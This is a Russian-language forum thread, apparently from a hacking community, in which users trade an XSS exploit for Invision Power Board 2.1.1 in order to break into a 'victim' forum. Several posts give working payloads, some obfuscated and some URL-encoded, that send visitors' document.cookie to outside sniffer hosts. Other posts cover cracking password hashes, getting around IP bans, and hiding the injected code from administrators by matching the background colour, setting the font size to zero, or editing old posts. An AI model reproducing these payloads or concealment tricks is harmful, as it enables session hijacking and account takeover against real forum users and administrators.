Привет! Нужен эксплойт для Ipb 2.1.1. Кто нить может помочь?

.*src=*"*h*;*6;
*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;
*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7; *9;
*03;&*#105;*-*;b*; *5;
*10;&*#47;s.j&*#112;g?"+document.cookie); ] [/topic]]



Поудаляй все звёздочки из спец. символов. И про репу не забываем ;-)

Седня вошел на форум-жертву тока хеш расшифровывать както в лом (по моему долгое это занятие). Естественно чтоб попасть в админку требует пароль юзера. Подскажите пожалуйста, есть какие нить реальные проги по раскодированию хэшей и может быть есть способ по другому попасть в админку.
ПС: FQziT за код спасибо - как проверю, если сработает + к репе с меня

IPB 2.x ты хэш не расшифруешь
почему? - юзай поиск...

IPB 2.x ты хэш не расшифруешь
почему? - юзай поиск...

вот хэщ - 52371906352bc10de868a5b733134888 - его возможно расшифровать?

Zheca
Нет. И пользуйся поиском по форуму. Об этом уже говорили.

Ок! Все понял - кончаю тупить

Ввел код в сообщение - ниче не вышло - наверное я гдето лишнюю звездочку убрал

это уже где-то публиковали, так что надеюсь никто не против
http://kobeluga.narod.ru/codes.txt

Там короче соль. Соль - это шифруется шифрованный пароль. Вот так.
Качай видео по взлому :
http://video.antichat.net/archive/coyl/ipb2.rar
http://video.antichat.net/archive/MicRo/ipb.rar
http://video.antichat.net/archive/LittleLamer/ipb20x.rar
Всё.

+ к репе FQziT

Смотря под чего блокали ? если по айпи то некак (только прокси),под ник если просто зареги новый и удали куки и файлы.

А если хост отрезали - то я понимаю тока прокси остается?

Отсканил сервак и получил " возможно, выполнить произвольный код на уязвимость системе". Есть эксплойт. Кто нить может ссылочку дать ссылочку?

Zheca Ты читать вообще умеешь?! Причём тут DDos атака и форумы IPB 2.1.1??? И вобще Античат против ДДоса.

Спасиб конечно за -1 :(( Я знаю что Античат против ДДос. Может я непонятно выразился - но я не собираюсь ддосить - меня интересует сторочка о выполнении произвольного кода. А сканил я сервак с установленным на нем ипб 2.1.1

И еще вопрос: а возможно всатвление кода не в пост а в название темы при ее создании?

На воруме который я ломаю админ - гад уж больно прбитый и глазастый. Сходу вычисляет ссылочку на снифер - удаляет пост и юзера. Может быть стоит какая нить защита, которая активируется как тока я выкладываю ссылку на снифер?

Глазастый админ это прикольно=)
А серьёзно. Какой нибудь способ автоматом ловить внедрённый сниффер есть?

Вопросик появился: После внедрения этого зловредного кода остается что-то вроде [topic/]]. Можно ли этого избежать?

Вопросик появился: После внедрения этого зловредного кода остается что-то вроде [topic/]]. Можно ли этого избежать?
Если что-то остается, то можно замаскировать под цвет фона хы-хы...
но хз... у мя ничего не оставалось никогда...

по поводу глазастых админов...
не все XSS работают в Опере... опера не так воспринимает ` как IE ... короч маскируйте посты цветом....

оффтоп... а некоторые форумы типа ЭксББ не проверяют размер шрифта.... можно SIZE=0 поставить и вообще никто не разглядит чего там написано.

Помог такой код:

wj@wj.com.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ] (wj/style=background:url(javascript:document.images[1)

Вопрос: А как закодировать в такие вот коды сниффер http://s.netsec.ru/sec/pic.gif

Имеется в виду символы адреса в код

%5BEMAIL%5Dwj@wj.com%5BURL%3Dwj/style%3Dbackground%3Aurl%28javascript%3Adocument.i mages%5B1%5D.src%3D%22http%3A//s.netsec.ru/sec/pic.gif%3F%22document.cookie%29%3B%20%5D%5B/URL%5D%5B/EMAIL%5D


На вот так вроде!

Можеш тут _http://webmastertools.narod.ru/OnlineTools/url_decode.html , поменяй сылку на снифер _http://antichat.ru/cgi-bin/s.jpg на http://s.netsec.ru/sec/pic.gif , и кодируй.

А если код вставить в свое же собщение, но в то которое я писал допустим ранее - ну отредактировать свое старое сообщение, он будет работать? То есть после него уже могло куча народу запостится - а так отредактирую старое сообщение и админу глаза не мозолит и мне приятно

А если код вставить в свое же собщение, но в то которое я писал допустим ранее - ну отредактировать свое старое сообщение, он будет работать? То есть после него уже могло куча народу запостится - а так отредактирую старое сообщение и админу глаза не мозолит и мне приятноТы получаешь куки только с той страницы на которой отображается твоё сообщение. Сомневаюсь что многие будут листать топик назад и читать, допустим вторую его страницу, а не последнии сообщения, допустим на десятой.

Это понятно - это будет работать? - или нужно обязательно создавать новый пост?

Будет, при условии что оно отобразится на страничке у жертвы.

Эт я к вопросам по поводу того, что текст кода виден из других браузеров - и админ удаляет посты. Ведб это выход - запостится, подождать пока накопятся сообщения, и пока не совершился переход на следующую страницу - изменить свой первый пост вставив туда код. Пару, тройку юзеров можно поймать вот таким образом

Если что-то остается, то можно замаскировать под цвет фона хы-хы...
но хз... у мя ничего не оставалось никогда...

по поводу глазастых админов...
не все XSS работают в Опере... опера не так воспринимает ` как IE ... короч маскируйте посты цветом....

оффтоп... а некоторые форумы типа ЭксББ не проверяют размер шрифта.... можно SIZE=0 поставить и вообще никто не разглядит чего там написано.
Нет это не правильно, прочти http://forum.antichat.ru/showthread.php?t=11807 Я дал пример как это можно реальзивать. ` тут СОВСЕМ не причем!